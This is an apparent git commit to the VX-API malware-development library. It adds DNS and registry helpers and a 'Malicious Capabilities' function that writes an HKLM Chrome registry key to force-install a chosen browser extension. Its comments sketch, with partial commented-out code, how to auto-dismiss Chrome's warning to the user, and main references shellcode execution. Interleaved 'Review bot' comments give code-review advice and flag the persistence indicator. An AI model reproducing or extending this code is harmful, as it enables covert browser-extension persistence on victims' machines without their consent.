2.0.388
This commit is contained in:
vxunderground 2022-11-13 08:21:54 -06:00
parent fc578c6782
commit 597f618250
9 changed files with 278 additions and 23 deletions


@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.379
Version: 2.0.388
Developer: smelly__vx
@ -113,6 +113,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetProcessBinaryNameFromHwndW | smelly__vx | Helper Functions |
| GetByteArrayFromFile | smelly__vx | Helper Functions |
| Ex_GetHandleOnDeviceHttpCommunication | x86matthew | Helper Functions |
| IsRegistryKeyValid | smelly__vx | Helper Functions |
| GetKUserSharedData | Geoff Chappell | Library Loading |
| GetModuleHandleEx2 | smelly__vx | Library Loading |
| GetPeb | 29a | Library Loading |
@ -147,6 +148,7 @@ You're free to use this in any manner you please. You do not need to use this en
| DnsGetDomainNameIPv4AddressAsString | smelly__vx | Networking |
| DnsGetDomainNameIPv4AddressUnsignedLong | smelly__vx | Networking |
| GetDomainNameFromUnsignedLongIPV4Address | smelly__vx | Networking |
| GetDomainNameFromIPV4AddressAsString | smelly__vx | Networking |
# Todo list


@ -0,0 +1,49 @@
#include "Win32Helper.h"
BOOL GetDomainNameFromIPV4AddressAsStringW(_In_ PWCHAR IpAddress, _Inout_ PWCHAR DomainName)
{
WSADATA WindowsSocketData = { 0 };
BOOL bFlag = FALSE;
SOCKADDR_IN AddressInformation = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &WindowsSocketData) != ERROR_SUCCESS)
return FALSE;
AddressInformation.sin_family = AF_INET;
AddressInformation.sin_addr.S_un.S_addr = ConvertIPv4StringToUnsignedLongW(IpAddress);
if (GetNameInfoW((CONST SOCKADDR*) & AddressInformation, sizeof(SOCKADDR), DomainName, 32, NULL, 0, NI_NUMERICSERV) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
WSACleanup();
return bFlag;
}
BOOL GetDomainNameFromIPV4AddressAsStringA(_In_ PCHAR IpAddress, _Inout_ PCHAR DomainName)
{
WSADATA WindowsSocketData = { 0 };
BOOL bFlag = FALSE;
SOCKADDR_IN AddressInformation = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &WindowsSocketData) != ERROR_SUCCESS)
return FALSE;
AddressInformation.sin_family = AF_INET;
AddressInformation.sin_addr.S_un.S_addr = ConvertIPv4StringToUnsignedLongA(IpAddress);
if (GetNameInfoA((CONST SOCKADDR*) & AddressInformation, sizeof(SOCKADDR), DomainName, 32, NULL, 0, NI_NUMERICSERV) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
WSACleanup();
return bFlag;
}
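Review bot: The `32` passed to GetNameInfoW at line 43 (and GetNameInfoA at line 59) is an undocumented contract on DomainName: the function takes no length, so a caller whose buffer holds fewer than 32 elements gets an out-of-bounds write, and any resolved name longer than 31 characters simply makes the call fail even though NI_MAXHOST-sized buffers are the Winsock convention. Since both functions are new in this commit, take the size explicitly: `BOOL GetDomainNameFromIPV4AddressAsStringW(_In_ PWCHAR IpAddress, _Inout_ PWCHAR DomainName, _In_ DWORD DomainNameLength)` and pass `DomainNameLength` in place of `32` (mirrored in the A variant and in the Win32Helper.h declarations); failing that, state the 32-element requirement in a comment above each definition. The value returned by ConvertIPv4StringToUnsignedLongW/A at lines 42/58 is stored without a check; if that helper reports a malformed address through a sentinel value, the sentinel is handed to GetNameInfo as if it were an address, which is worth confirming against the helper and rejecting before the call. The name that comes back is whatever the owner of the reverse zone put in the PTR record, so callers should treat DomainName as untrusted input rather than a verified identity, and a line to that effect in the header comment would be useful. `sizeof(SOCKADDR)` at lines 43/59 happens to equal sizeof(SOCKADDR_IN), but `sizeof(AddressInformation)` says what is actually meant.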


@ -0,0 +1,27 @@
#include "Win32Helper.h"
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path)
{
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
dwError = RegOpenKeyExW(PredefinedKey, Path, 0, GENERIC_READ | GENERIC_WRITE, &hKey);
if (hKey)
RegCloseKey(hKey);
return dwError;
}
DWORD IsRegistryKeyValidA(_In_ HKEY PredefinedKey, _In_ PCHAR Path)
{
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
dwError = RegOpenKeyExA(PredefinedKey, Path, 0, GENERIC_READ | GENERIC_WRITE, &hKey);
if (hKey)
RegCloseKey(hKey);
return dwError;
}
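Review bot: RegOpenKeyExW at line 75 (and RegOpenKeyExA at line 84) requests `GENERIC_READ | GENERIC_WRITE` although the function only tests whether the key can be opened and closes it immediately; for a key that exists but is not writable by the caller this yields ERROR_ACCESS_DENIED, which callers cannot tell apart from a genuinely bad path, and it asks for more rights than the check needs. Use the registry-specific read mask instead: `dwError = RegOpenKeyExW(PredefinedKey, Path, 0, KEY_READ, &hKey);` and the same with KEY_READ in the A variant. The `DWORD dwError = ERROR_SUCCESS;` initializer at lines 74/83 is overwritten on the next line, so the declaration can be folded into the call. A one-line contract comment above each definition would help callers interpret the result, e.g. `// Returns ERROR_SUCCESS if the key exists and can be opened for reading, ERROR_FILE_NOT_FOUND if it does not exist, otherwise another Win32 error code.` The Win32Helper.h hunk on this page declares only IsRegistryKeyValidW; the A variant defined here may be declared outside the visible lines, but that is worth confirming.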


@ -34,8 +34,10 @@ int main(VOID)
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
Sei.MethodEnum = E_DNSQUERYEX;
WCHAR IpBuffer[32] = { 0 };
//MpfSilentInstallGoogleChromePluginW((PWCHAR)L"aapbdbdomjkkjkaonfhkkikfgjllcleb");
MpfComMonitorChromeSessionOnce2();
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
return dwError;
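Review bot: `WCHAR IpBuffer[32] = { 0 };` added at line 96 is not referenced by any visible line of the hunk, so as committed it appears to be an unused local (the call that presumably consumed it is not in the hunk), which compiles with a warning and hides the buffer-size coupling to the new GetDomainNameFromIPV4AddressAsStringW, whose GetNameInfoW call hard-codes 32; either drop the declaration or keep it next to the call that uses it with a comment naming that dependency. The new call to `MpfComMonitorChromeSessionOnce2()` at line 98 has no declaration in the Win32Helper.h hunk shown on this page, which declares only MpfComMonitorChromeSessionOnce; if it is not declared elsewhere in the header the build will fail on this line. main's body starts and ends outside the hunk.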


@ -129,7 +129,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID)
IUIAutomationElementArray* Array = NULL;
EventHandler *EventHandlerObject = NULL;
EventHandlerObject = new EventHandler();
if (!EventHandlerObject)
return -1;
@ -201,7 +200,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID)
else
bHandlerPresent = TRUE;
for (;;) { Sleep(10); } //let event handler work
bFlag = TRUE;
@ -232,4 +230,4 @@ EXIT_ROUTINE:
CoUninitialize();
return dwError;
}
}


@ -163,6 +163,7 @@
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
<ClCompile Include="GetCurrentUserSid.cpp" />
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
<ClCompile Include="GetDomainNameFromIPV4AddressAsString.cpp" />
<ClCompile Include="GetDomainNameFromUnsignedLongIPV4Address.cpp" />
<ClCompile Include="GetFileSizeFromPath.cpp" />
<ClCompile Include="GetKUserSharedData.cpp" />
@ -214,6 +215,7 @@
<ClCompile Include="IsPathValid.cpp" />
<ClCompile Include="IsProcessRunning.cpp" />
<ClCompile Include="IsProcessRunningAsAdmin.cpp" />
<ClCompile Include="IsRegistryKeyValid.cpp" />
<ClCompile Include="Main.cpp" />
<ClCompile Include="ManualResourceDataFetching.cpp" />
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
@ -224,6 +226,7 @@
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
<ClCompile Include="RecursiveFindFile.cpp" />


@ -55,6 +55,9 @@
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity">
<UniqueIdentifier>{71e7ff3a-c576-49b0-96e2-0b4479a5fa5f}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Main.cpp">
@ -414,29 +417,38 @@
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="GetByteArrayFromFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="GetDomainNameFromUnsignedLongIPV4Address.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="GetDomainNameFromIPV4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="MpfSilentInstallGoogleChromePlugin.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="IsRegistryKeyValid.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>


@ -203,7 +203,7 @@ BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryNa
BOOL GetByteArrayFromFileW(_Inout_ PBYTE Buffer, _In_ PWCHAR Path, _In_ ULONGLONG BytesToRead);
BOOL GetByteArrayFromFileA(_Inout_ PBYTE Buffer, _In_ PCHAR Path, _In_ ULONGLONG BytesToRead);
BOOL Ex_GetHandleOnDeviceHttpCommunication(_Out_ PHANDLE Handle);
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
/*******************************************
@ -253,6 +253,8 @@ DWORD MpfGetLsaPidFromNamedPipe(VOID);
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
DWORD MpfComMonitorChromeSessionOnce(VOID);
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
@ -310,4 +312,6 @@ DWORD DnsGetDomainNameIPv4AddressAsStringA(_In_ PCHAR DomainName, _Inout_ PCHAR
ULONG DnsGetDomainNameIPv4AddressUnsignedLongW(_In_ PWCHAR DomainName);
ULONG DnsGetDomainNameIPv4AddressUnsignedLongA(_In_ PCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressW(_In_ ULONG IpAddress, _Inout_ PWCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressA(_In_ ULONG IpAddress, _Inout_ PCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressA(_In_ ULONG IpAddress, _Inout_ PCHAR DomainName);
BOOL GetDomainNameFromIPV4AddressAsStringW(_In_ PWCHAR IpAddress, _Inout_ PWCHAR DomainName);
BOOL GetDomainNameFromIPV4AddressAsStringA(_In_ PCHAR IpAddress, _Inout_ PCHAR DomainName);
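Review bot: The two declarations added at lines 228–229 start with `__unstable__preview__`, and any identifier containing a double underscore is reserved to the implementation in both C and C++, so these names can collide with compiler or CRT symbols and are formally undefined; a prefix without underscores (for example `UnstablePreview_MpfSilentInstallGoogleChromePluginW`, a constructed suggestion) conveys the same status, and the same rename applies to the definitions in the new MpfSilentInstallGoogleChromePlugin source at the end of this page. The project files at lines 143 and 207 register the source as MpfSilentInstallGoogleChromePlugin.cpp, so whatever name is chosen should be used consistently in the header, the source and the README table. Line 222 declares IsRegistryKeyValidW only, while this commit's IsRegistryKeyValid.cpp also defines IsRegistryKeyValidA; unless the A prototype lives outside the visible lines, callers of the A variant will fail with an undeclared identifier. Lines 234 and 235 show the GetDomainNameFromUnsignedLongIPV4AddressA prototype twice; if that is a real duplicated line rather than a rendering artifact it is harmless but should be deduplicated.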


@ -0,0 +1,158 @@
#include "Win32Helper.h"
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier)
{
WCHAR RegistryKeyPath[MAX_PATH] = L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\";
WCHAR UpdateUrl[MAX_PATH] = L"https://clients2.google.com/service/update2/crx";
BOOL bFlag = FALSE;
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
if (!IsProcessRunningAsAdmin()) //admin required
goto EXIT_ROUTINE;
if (StringConcatW(RegistryKeyPath, ExtensionIdentifier) == NULL)
goto EXIT_ROUTINE;
dwError = IsRegistryKeyValidW(HKEY_LOCAL_MACHINE, RegistryKeyPath);
if (dwError == ERROR_SUCCESS) //already installed
goto EXIT_ROUTINE;
if (dwError != ERROR_FILE_NOT_FOUND) //other error occurred
goto EXIT_ROUTINE;
dwError = ERROR_SUCCESS;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegistryKeyPath, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
if(RegSetValueExW(hKey, L"update_url", 0, REG_SZ, (PBYTE)UpdateUrl, StringLengthW(UpdateUrl) * sizeof(WCHAR)) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
// This code causes Chrome to display an error, it alerts the user
// that a new chrome extension has been silently installed. It
// asks the user whether or not they'd like to enable it, disable it,
// or remove it. The goal now is to use the IUIAutomation API to
// programmatically enable the plugin. The code bottom is borrowed
// from the other functionality present in MpfComMonitorChromeSessionOnce,
// which, although needs revision, is sufficient enough for this experimental
// code base. The code is currently commented out, but it is nearly
// complete. It successfully identifies the ERROR message thrown,
// it is able to SetFocus and find the text. All that remains is
// getting the POINT structure, filling it, automating a click, and then
// sending the ENTER command as SENDINPUT, to enable the script. This
// method is unorthodox, and may be prone to errors as it relies on the
// chrome being open at the time the extension is installed. Other methods
// need to be discovered to silently install extensions.
// An alternative method is Chrome native messaging, or reverse engineering
// chrome plugin DB files in %LOCALAPPDATA% to determine how to enable
// it without having to interface with chrome or the IUI
//
// -smelly, November 13th, 2022
/*
INCOMPLETE CODE BASE NEEDS TO BE INCLUDED
HWND hChrome = NULL;
DWORD dwError = ERROR_SUCCESS;
INT Length = 0;
BOOL bFlag = FALSE, bHandlerPresent = FALSE;
HRESULT Result = ERROR_SUCCESS;
IUIAutomation* Automaton = NULL;
IUIAutomationElement* Element = NULL;
IUIAutomationCondition* Condition = NULL;
IUIAutomationElementArray* Array = NULL;
EventHandler* EventHandlerObject = NULL;
EventHandlerObject = new EventHandler();
if (!EventHandlerObject)
return -1;
Result = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
for (;;)
{
WCHAR Buffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
if (!GetProcessBinaryNameFromHwndW(GetForegroundWindow(), Buffer, MAX_PATH * sizeof(WCHAR)))
continue;
if (StringFindSubstringW(Buffer, (PWCHAR)L"chrome.exe") != NULL)
break;
}
hChrome = FindWindowExW(NULL, hChrome, L"Chrome_WidgetWin_1", NULL);
if (hChrome == NULL)
goto EXIT_ROUTINE;
Result = CoCreateInstance(CLSID_CUIAutomation, NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&Automaton));
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->ElementFromHandle(hChrome, &Element);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->CreatePropertyCondition(UIA_ControlTypePropertyId, CComVariant(UIA_ToolBarControlTypeId), &Condition);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Element->FindAll(TreeScope_Descendants, Condition, &Array);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Array->get_Length(&Length);
for (INT i = 0; i < Length; i++)
{
CComBSTR NameObject;
IUIAutomationElementArray* ccArray = NULL;
INT ccLength = 0;
Result = Array->GetElement(i, &EventHandlerObject->Pane);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->CreatePropertyCondition(UIA_ControlTypePropertyId, CComVariant(UIA_MenuItemControlTypeId), &Condition);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = EventHandlerObject->Pane->FindAll(TreeScope_Descendants, Condition, &ccArray);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
ccArray->get_Length(&ccLength);
for (INT y = 0; y < ccLength; y++)
{
CComBSTR ccNameObject;
Result = ccArray->GetElement(y, &EventHandlerObject->Pane);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
EventHandlerObject->Pane->get_CurrentName(&ccNameObject);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
if(StringCompareW(ccNameObject, L"Error") == ERROR_SUCCESS)
EventHandlerObject->Pane->SetFocus(); <------- ERROR MESSAGE IS HERE IN EVENTHANDLEROBJECT
}
return dwError;
*/
EXIT_ROUTINE:
if (hKey)
RegCloseKey(hKey);
return bFlag;
}
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier)
{
return FALSE;
}
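Review bot: The "already installed" branch at lines 255–256 jumps to EXIT_ROUTINE with bFlag still FALSE, so a caller receives the same FALSE for "key already present", "not elevated" and every real registry failure, and the `dwError = ERROR_SUCCESS;` at line 259 is a dead store because dwError is never read again. Either return TRUE for the already-present case or document the collapsed result in a comment above the function, e.g. `// Returns TRUE only when the extension key was created by this call; FALSE when not elevated, when the key already exists, or on any registry error.` The function's own comment at lines 265–267 states that Chrome alerts the user once the key is written, so "Silent" in the name overstates what the code does and the header comment should say so plainly; from a defender's standpoint, creation of keys under the HKLM Chrome Extensions path written here is a well-known browser-extension persistence indicator that endpoint registry monitoring is expected to surface. The roughly seventy lines of commented-out code at lines 285–355 (including the `<-------` annotation at line 352) sit inside the function body; keeping the design note but moving the dead code under `#if 0` or into a tracked TODO keeps the shipped function readable. The A variant at lines 361–364 always returns FALSE with no indication that it is a stub, so add `// TODO: not implemented; the ANSI variant currently always fails.` above it so callers do not mistake it for a working path.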